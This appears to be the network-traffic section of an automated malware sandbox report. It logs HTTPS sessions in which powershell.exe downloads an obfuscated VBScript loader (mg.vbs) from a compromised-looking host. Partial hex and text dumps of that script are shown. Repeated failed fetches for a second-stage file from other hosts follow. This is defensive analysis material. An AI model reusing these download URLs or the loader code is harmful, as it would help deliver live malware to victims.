                                                                                                    2024-12-05 09:44:51 UTC8192INData Raw: 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 30 35 2d 72 61 63 63 6f 72 64 65 72 69 61 2d 69 6e 2d 6f 74 74 6f 6e 65 2d 75 73 6f 2d 63 69 76 69 6c 65 2d 69 6e 64 75 73 74 72 69 61 6c 65 2d 65 2d 70 65 72 2d 70 6f 6d 70 65 2d 69 64 72 61 75 6c 69 63 68 65 22 20 74 69 74 6c 65 3d 22 52 61 63 63 6f 72 64 65 72 69 61 20 69 6e 20 6f 74 74 6f 6e 65 20 75 73 6f 20 63 69 76 69 6c 65 2c 20 69 6e 64 75 73 74 72 69 61 6c 65 20 65 20 70 65 72 20 70 6f 6d 70 65 20 69 64 72 61 75 6c 69 63 68 65 22 3e 52 61 63 63 6f 72 64 65 72 69 61 20 69 6e 20 6f 74 74 6f 6e 65 20 75 73 6f 20 63 69 76 69 6c 65 2c 20 69 6e 64 75 73 74 72 69 61 6c 65 20 65 20 70 65 72 20 70 6f 6d 70 65 20 69 64 72 61 75 6c 69 63 68
                                                                                                    Data Ascii: ss=""><a href="https://www.fornid.com/305-raccorderia-in-ottone-uso-civile-industriale-e-per-pompe-idrauliche" title="Raccorderia in ottone uso civile, industriale e per pompe idrauliche">Raccorderia in ottone uso civile, industriale e per pompe idraulich
                                                                                                    2024-12-05 09:44:51 UTC8192INData Raw: 6d 70 65 2d 70 65 72 2d 74 72 61 74 74 6f 72 69 22 20 74 69 74 6c 65 3d 22 50 6f 6d 70 65 20 70 65 72 20 74 72 61 74 74 6f 72 69 22 3e 50 6f 6d 70 65 20 70 65 72 20 74 72 61 74 74 6f 72 69 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 35 33 2d 70 6f 6d 70 65 2d 70 65 72 2d 66 6f 67 6e 61 74 75 72 61 22 20 74 69 74 6c 65 3d 22 50 6f 6d 70 65 20 70 65 72 20 66 6f 67 6e 61 74 75 72 61 22 3e 50 6f 6d 70 65 20 70 65 72 20 66 6f 67 6e 61 74 75 72 61 3c 2f 61 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 74 6d 5f 73 75 62 55 4c 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e
                                                                                                    Data Ascii: mpe-per-trattori" title="Pompe per trattori">Pompe per trattori</a></li><li class=""><a href="https://www.fornid.com/253-pompe-per-fognatura" title="Pompe per fognatura">Pompe per fognatura</a><ul class="tm_subUL"><li class=""><a href="https://www.fornid.
                                                                                                    2024-12-05 09:44:52 UTC8192INData Raw: 70 65 72 20 69 72 72 6f 72 61 7a 69 6f 6e 65 20 63 6f 6e 20 6d 6f 74 6f 70 6f 6d 70 65 22 3e 43 61 72 72 65 6c 6c 69 20 70 65 72 20 69 72 72 6f 72 61 7a 69 6f 6e 65 20 63 6f 6e 20 6d 6f 74 6f 70 6f 6d 70 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 32 35 2d 6d 6f 74 6f 70 6f 6d 70 65 2d 69 72 72 6f 72 61 74 72 69 63 69 22 20 74 69 74 6c 65 3d 22 4d 6f 74 6f 70 6f 6d 70 65 20 69 72 72 6f 72 61 74 72 69 63 69 22 3e 4d 6f 74 6f 70 6f 6d 70 65 20 69 72 72 6f 72 61 74 72 69 63 69 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66
                                                                                                    Data Ascii: per irrorazione con motopompe">Carrelli per irrorazione con motopompe</a></li><li class=""><a href="https://www.fornid.com/225-motopompe-irroratrici" title="Motopompe irroratrici">Motopompe irroratrici</a></li></ul></li><li class=""><a href="https://www.f
                                                                                                    2024-12-05 09:44:52 UTC8192INData Raw: 3e 0a 0a 09 09 09 09 09 3c 64 69 76 3e 0a 0a 09 09 09 09 09 09 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 64 61 72 6b 22 3e 54 6f 74 61 6c 65 3c 2f 73 74 72 6f 6e 67 3e 0a 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 6c 61 79 65 72 5f 63 61 72 74 5f 70 72 6f 64 75 63 74 5f 70 72 69 63 65 22 3e 3c 2f 73 70 61 6e 3e 0a 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 79 65 72 5f 63 61 72 74 5f 63 61 72 74 20 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 6d 64 2d 36 22 3e 0a 0a 09 09 09 09 3c 70 3e 0a 0a 09 09 09 09 09 3c 21 2d 2d 20 50 6c 75 72 61 6c 20 43 61 73 65 20 5b 62 6f 74 68 20 63 61 73 65 73 20 61 72 65 20 6e 65 65 64 65 64 20 62 65
                                                                                                    Data Ascii: ><div><strong class="dark">Totale</strong><span id="layer_cart_product_price"></span></div></div></div><div class="layer_cart_cart col-xs-12 col-md-6"><p>... Plural Case [both cases are needed be
                                                                                                    2024-12-05 09:44:52 UTC8192INData Raw: 65 6c 65 74 74 72 6f 6e 69 63 69 2d 6c 69 66 74 65 72 2d 62 79 2d 70 72 61 6d 61 63 22 20 74 69 74 6c 65 3d 22 54 72 61 6e 73 70 61 6c 6c 65 74 20 65 6c 65 74 74 72 6f 6e 69 63 69 20 20 4c 49 46 54 45 52 20 42 59 20 50 52 41 4d 41 43 22 3e 54 72 61 6e 73 70 61 6c 6c 65 74 20 65 6c 65 74 74 72 6f 6e 69 63 69 20 20 4c 49 46 54 45 52 20 42 59 20 50 52 41 4d 41 43 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 33 39 2d 64 69 73 74 72 69 62 75 7a 69 6f 6e 65 2d 67 72 61 73 73 6f 2d 6d 65 63 6c 75 62 65 22 20 74 69 74 6c 65 3d 22 44 49 53 54 52 49 42 55 5a 49 4f 4e 45 20 47 52 41 53 53 4f 20 4d 45 43 4c 55 42 45 22
                                                                                                    Data Ascii: elettronici-lifter-by-pramac" title="Transpallet elettronici LIFTER BY PRAMAC">Transpallet elettronici LIFTER BY PRAMAC</a></li></ul></li><li class=""><a href="https://www.fornid.com/339-distribuzione-grasso-meclube" title="DISTRIBUZIONE GRASSO MECLUBE"
                                                                                                    2024-12-05 09:44:52 UTC408INData Raw: 46 50 32 20 2d 20 46 46 50 33 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 39 30 2d 6d 61 73 63 68 65 72 65 2d 70 65 72 2d 73 61 6c 64 61 74 75 72 61 22 20 74 69 74 6c 65 3d 22 4d 61 73 63 68 65 72 65 20 70 65 72 20 73 61 6c 64 61 74 75 72 61 22 3e 4d 61 73 63 68 65 72 65 20 70 65 72 20 73 61 6c 64 61 74 75 72 61 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 31 34 2d 73 63 61 72 70 65 2d 61 6e 74 69 6e 66 6f 72 74 75 6e 69 73 74 69 63 68 65 2d 65 2d 73 74 69 76 61 6c 65 2d 64 61 2d 6c 61 76 6f 72 6f 22 20 74 69 74 6c 65 3d
                                                                                                    Data Ascii: FP2 - FFP3</a></li><li class=""><a href="https://www.fornid.com/90-maschere-per-saldatura" title="Maschere per saldatura">Maschere per saldatura</a></li><li class=""><a href="https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro" title=


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.64971591.193.42.134434904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:44:54 UTC79OUTGET /na/mg.vbs HTTP/1.1
                                                                                                    Host: www.pineappletech.ae
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:44:54 UTC232INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    content-type: text/vbscript
                                                                                                    last-modified: Thu, 27 Jun 2024 13:15:58 GMT
                                                                                                    accept-ranges: bytes
                                                                                                    content-length: 29287
                                                                                                    date: Thu, 05 Dec 2024 09:44:54 GMT
                                                                                                    server: LiteSpeed
                                                                                                    vary: User-Agent
                                                                                                    2024-12-05 09:44:54 UTC1136INData Raw: 0d 0a 0d 0a 0d 0a 46 75 6e 63 74 69 6f 6e 20 53 65 61 73 6f 6e 69 6e 67 28 41 6d 62 72 61 69 6e 29 0d 0a 0d 0a 0d 0a 50 75 62 6c 69 6b 75 6d 6d 65 74 62 61 74 66 6f 77 6c 20 3d 20 4d 69 64 28 4d 69 64 42 28 43 6f 6d 6d 61 6e 64 2c 20 34 34 2c 20 32 31 33 29 2c 32 31 2c 32 35 29 0d 0a 0d 0a 53 65 61 73 6f 6e 69 6e 67 20 3d 20 43 68 72 57 28 41 6d 62 72 61 69 6e 29 0d 0a 0d 0a 4f 70 73 6b 72 65 6b 6e 69 76 73 70 6c 69 64 20 3d 20 43 6f 6d 6d 61 6e 64 20 0d 0a 0d 0a 0d 0a 45 6e 64 20 46 75 6e 63 74 69 6f 6e 20 0d 0a 0d 0a 65 6c 65 6b 74 72 6f 69 6e 67 65 6e 69 72 65 72 6e 65 20 3d 20 4c 65 6e 42 28 22 53 61 72 64 69 6e 69 65 72 65 6e 22 29 20 0d 0a 65 6c 65 6b 74 72 6f 69 6e 67 65 6e 69 72 65 72 6e 65 20 3d 20 65 6c 65 6b 74 72 6f 69 6e 67 65 6e 69 72 65 72
                                                                                                    Data Ascii: Function Seasoning(Ambrain)Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)Seasoning = ChrW(Ambrain)Opskreknivsplid = Command End Function elektroingenirerne = LenB("Sardinieren") elektroingenirerne = elektroingenirer
                                                                                                    2024-12-05 09:44:54 UTC14994INData Raw: 43 6f 6e 73 74 20 54 61 70 65 74 69 20 3d 20 22 44 65 6e 69 61 62 6c 65 20 64 61 74 61 73 74 79 72 20 75 6e 63 65 6c 69 62 61 74 65 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4e 6f 61 6f 72 64 65 74 73 20 3d 20 2d 34 35 30 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4f 73 74 65 6d 61 64 20 3d 20 26 48 37 35 30 32 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 42 6f 74 72 79 6f 6d 79 63 65 73 31 34 31 20 3d 20 26 48 46 46 46 46 45 38 38 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 55 66 6f 72 64 72 61 67 65 6c 69 67 73 74 65 20 3d 20 26 48 35 41 36 35 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 52 65 76 65 72 73 6f 20 3d 20 26 48 45 39 34 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 53 61 61 74 73 20 3d 20 22 44 65 63 69 6d
                                                                                                    Data Ascii: Const Tapeti = "Deniable datastyr uncelibate"Private Const Noaordets = -4508Private Const Ostemad = &H7502Private Const Botryomyces141 = &HFFFFE888Private Const Ufordrageligste = &H5A65Private Const Reverso = &HE948Private Const Saats = "Decim
                                                                                                    2024-12-05 09:44:54 UTC13157INData Raw: 65 64 6e 65 73 73 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 53 6b 61 6b 73 70 69 6c 6c 65 72 65 6e 73 20 3d 20 31 37 34 38 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 47 6c 69 6e 73 65 6e 64 65 20 3d 20 2d 34 32 34 35 34 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 45 76 61 73 69 76 65 6e 65 73 73 20 3d 20 26 48 34 38 43 45 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4c 65 70 74 6f 72 72 68 69 6e 69 73 6d 31 35 35 20 3d 20 2d 31 38 39 31 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 50 72 6f 67 72 61 6d 6b 6f 6d 70 6c 65 6b 73 65 74 20 3d 20 22 43 6f 6e 67 72 65 73 73 65 73 20 6d 6f 6c 69 6d 65 6e 20 6e 67 73 74 65 6c 69 67 65 72 65 73 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 43 69 67 61 72 6b 61 73 73 65 20 3d 20 35
                                                                                                    Data Ascii: edness"Private Const Skakspillerens = 17488Private Const Glinsende = -42454Private Const Evasiveness = &H48CEPrivate Const Leptorrhinism155 = -18918Private Const Programkomplekset = "Congresses molimen ngsteligeres"Private Const Cigarkasse = 5


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.649728184.171.244.2314432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:44:58 UTC183OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                    Host: www.almrwad.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:44:59 UTC164INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 05 Dec 2024 09:44:59 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 315
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    2024-12-05 09:44:59 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.649747184.171.244.2314432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:45:05 UTC65OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.almrwad.com
                                                                                                    2024-12-05 09:45:05 UTC164INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 05 Dec 2024 09:45:05 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 315
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    2024-12-05 09:45:05 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.649763148.251.114.2334432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:45:11 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.erp-royal-crown.info
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:45:11 UTC238INHTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1251
                                                                                                    date: Thu, 05 Dec 2024 09:45:11 GMT
                                                                                                    server: LiteSpeed
                                                                                                    2024-12-05 09:45:11 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                                    2024-12-05 09:45:11 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.649775184.171.244.2314432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:45:16 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.almrwad.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:45:17 UTC164INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 05 Dec 2024 09:45:17 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 315
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    2024-12-05 09:45:17 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.649791148.251.114.2334432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:45:22 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.erp-royal-crown.info
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:45:23 UTC238INHTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1251
                                                                                                    date: Thu, 05 Dec 2024 09:45:23 GMT
                                                                                                    server: LiteSpeed
                                                                                                    2024-12-05 09:45:23 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                                    2024-12-05 09:45:23 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.649808184.171.244.2314432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:45:28 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.almrwad.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:45:29 UTC164INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 05 Dec 2024 09:45:29 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 315
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    2024-12-05 09:45:29 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    8192.168.2.649820148.251.114.2334432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:45:34 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.erp-royal-crown.info
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:45:35 UTC238INHTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1251
